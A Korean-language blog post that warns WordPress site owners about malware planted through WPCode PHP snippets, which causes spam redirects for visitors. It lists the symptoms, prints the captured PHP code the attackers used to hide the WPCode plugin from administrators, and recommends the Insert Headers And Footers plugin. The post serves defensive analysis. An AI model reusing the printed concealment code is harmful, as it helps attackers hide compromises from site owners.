워드프레스 사이트의 헤더나 푸터에 스크립트를 추가하려는 경우 다양한 방법으로 가능합니다. 차일드 테마의 함수 파일을 통해 코드를 추가하는 방법이 권장되지만 워드프레스 관리자 페이지에서 스크립트를 추가하고 싶은 경우 WPCode를 사용할 수 있습니다.
하지만 근래 들어 WPCode를 통해 악성코드가 삽입되는 경우가 늘어나고 있습니다. WPCode를 사용하면 HTML/자바스크립트 코드뿐만 아니라 PHP 코드도 삽입할 수 있습니다. WPCode에 악성 스크립트를 추가하고 WPCode가 관리자 페이지의 플러그인 목록에 보이지 않도록 하는 사례가 나타나고 있습니다.
WPCode의 대안으로 Insert Headers And Footers 플러그인을 고려할 수 있습니다. 이 플러그인을 사용하여 HTML/자바스크립트를 추가할 수 있지만 PHP 코드는 사용할 수 없습니다. 자바스크립트 코드를 통해 악성코드가 유입될 수는 있지만, PHP를 실행할 수 없어 WPCode에 비해서는 조금 안전할 수 있습니다.
워드프레스 헤더/푸터 코드 삽입, WPCode보다 더 안전한 방법은?
WPCode를 통한 악성코드 유입
개인적으로는 WPCode와 같은 플러그인의 사용을 권장하지 않지만, FTP/SFTP에 접속하지 않고 간단하게 워드프레스 관리자 페이지에서 간단하게 HTML/JavaScript 코드를 추가하고 싶은 경우 이 플러그인을 사용할 수 있습니다.
참고로 GeneratePress 테마를 사용하는 경우에는 Elements 기능을 사용하여 헤더와 푸터뿐만 아니라 원하는 곳에 HTML/자바스크립트/PHP 코드를 삽입할 수 있습니다.
WPCode에서는 PHP 코드도 추가할 수 있습니다.
관리자 페이지에서 PHP 코드를 삽입할 수 있다면 거의 모든 코드를 테마 함수 파일 대신 WPCode 내에서 추가할 수 있어 편리합니다.
WPCode의 PHP 스니펫을 통해 악성 코드가 삽입되어 방문자가 사이트를 방문할 때 이상한 스팸 사이트로 리디렉션되거나 팝업이 표시되는 사례가 증가하고 있습니다. 예를 들어, 아래 그림과 같이 iPhone 15 Pro에 당첨되었다는 페이지로 이동할 수 있습니다.
다음과 같은 몇 가지 특징이 있습니다.
- WPCode 플러그인이 알림판의 플러그인 목록에 표시가 안 됩니다.
- 방문자가 사이트 접속 시 이상한 팝업이 표시되거나 스팸 사이트로 리디렉션됩니다.
- 관리자로 로그인할 때에는 이상 증상이 나타나지 않습니다.
- 동일 PC나 폰에서도 이상 증상이 나타나지 않습니다.
몇 달 전에 이런 증상의 멀웨어 치료를 맡은 적이 있었습니다. 처음에는 어디에서 멀웨어가 유입되는지 찾는 데 조금 시간이 걸렸습니다. 악성코드를 살펴보니 관리자 페이지에서 WPCode 플러그인을 숨기는 코드가 PHP 스니펫으로 추가되어 있었습니다.
$_pwsa = '489558521040c71da15b24fd6c289e2e';
if (current_user_can('administrator') && !array_key_exists('show_all', $_GET)) {
add_action('admin_head', function () {
echo '<style>';
echo '#toplevel_page_wpcode { display: none; }';
echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
echo '#wpcode-notice-global-review_request { display: none; }';
echo '</style>';
});
add_action('wp_head', function () {
echo '<style>';
echo '#toplevel_page_wpcode { display: none; }';
echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
echo '#wpcode-notice-global-review_request { display: none; }';
echo '</style>';
});
add_filter('all_plugins', function ($plugins) {
unset($plugins['insert-headers-and-footers/ihaf.php']);
return $plugins;
});
}요즘 악성코드는 악질인 것이 로그인 사용자나 관리자로 접속하거나, 내 컴퓨터나 폰으로 접속할 때에는 멀웨어 증상이 나타나지 않고 방문자들이 사이트를 접속할 때 이상 증상이 나타난다는 점입니다.
카페24나 클라우드웨이즈 등에서는 자체 백업/복원 기능을 제공합니다. 카페24는 지난 7일, 클라우드웨이즈는 (백업 설정에 따라) 최대 4주 이내의 기간으로 사이트를 롤백할 수 있습니다.
하지만 관리자가 멀웨어 증상을 인지하지 못하여 방문자가 이 사실을 알려주기 전까지는 멀웨어 감염을 인식하지 못할 수도 있습니다.
사이트가 악성코드에 감염되어 리디렉션 현상이 발생한다면 방문자 수가 급감하는 등 SEO 문제가 발생할 수 있으므로 조기에 감지하여 멀웨어를 제거하는 것이 중요합니다.
참고로 클라우드웨이즈에서는 Malware Protection 기능을 통해 악성코드 감지 시에 경고 메일을 전송합니다.
WPCode의 대안... Insert Headers And Footers 플러그인
WPCode와 같은 플러그인을 사용하지 않는 것이 안전하지만, 알림판에서 HTML/JS 코드를 추가하고 싶은 경우 Insert Headers And Footers 플러그인을 대안으로 고려해볼 수 있습니다.
WPCode는 PHP 코드까지 삽입이 가능하여 기능과 편의성 측면에서는 우수하지만, 그만큼 리스크가 증가합니다. Insert Headers And Footers는 HTML/JS 코드를 삽입할 수 있지만, PHP 코드는 지원하지 않습니다.
이 플러그인은 워드프레스 관리자 페이지 » 플러그인 » 플러그인 추가에서 "Insert Headers And Footers"를 검색하여 설치할 수 있습니다.
WPCode는 헤더나 푸터에 스크립트를 추가하는 기능 이외에도 다양한 PHP 코드 라이브러리를 제공하고 PHP 코드를 추가할 수 있는 기능을 제공하지만, Insert Headers And Footers 플러그인은 헤더나 푸터에 HTML/JS 코드를 추가할 수 있는 기능만 제공합니다.
이 플러그인에 PHP 코드를 추가하여 테스트해보니 PHP 부분은 무시하고 나머지 스크립트가 실행되었습니다.
이 플러그인의 기능:
- 워드프레스 사이트의 헤더와 푸터에 코드 삽입 가능
- 구글 애널리틱스(Google Analytics) 코드 삽입 가능
- 페이스북 픽셀 코드 삽입 가능
- A/B 테스트를 위한 구글 옵티마이즈 코드 추가 가능
- 구글 서치 콘솔 인증 코드를 테마에 삽입해 사이트 소유권 확인 가능 (네이버 웹마스터 도구 사이트 소유 확인 코드도 추가 가능)
- 맞춤 CSS, 스크립트, HTML 코드 삽입 가능
- 구글 태그 관리자 코드 삽입 가능
- 마이크로소프트 클래리티(Microsoft Clarity) 추적 코드 삽입 가능
- 웹사이트 본문(body) 영역에도 코드 삽입 가능
- 빙 웹마스터 도구 코드로 사이트 인증 가능
- 구글 애드센스(AdSense) 코드 삽입 가능
WPCode 대안을 찾는 경우 이 플러그인을 고려해볼 수 있습니다. 이 플러그인은 5.0 만점에 5.0으로 사용자 평가도 좋은 편입니다.😄
마치며
이상으로 WPCode 플러그인의 대안으로 사용할 수 있는 Insert Headers And Footers 플러그인에 대하여 살펴보았습니다.
WPCode를 통해 악성코드가 유입되어 이상한 사이트로 리디렉션되는 등의 문제가 발생한다면 우선 WPCode를 삭제하면 증상은 사라질 수 있습니다. 하지만 악성코드가 삽입된 원인을 파악하여 완전히 제거하지 않으면 언제든지 재발하게 됩니다.
👉 멀웨어 감염을 비롯한 워드프레스 또는 웹호스팅 문제로 해결에 어려움을 겪는 경우 여기에서 서비스(유료)를 의뢰하실 수 있습니다.
댓글 남기기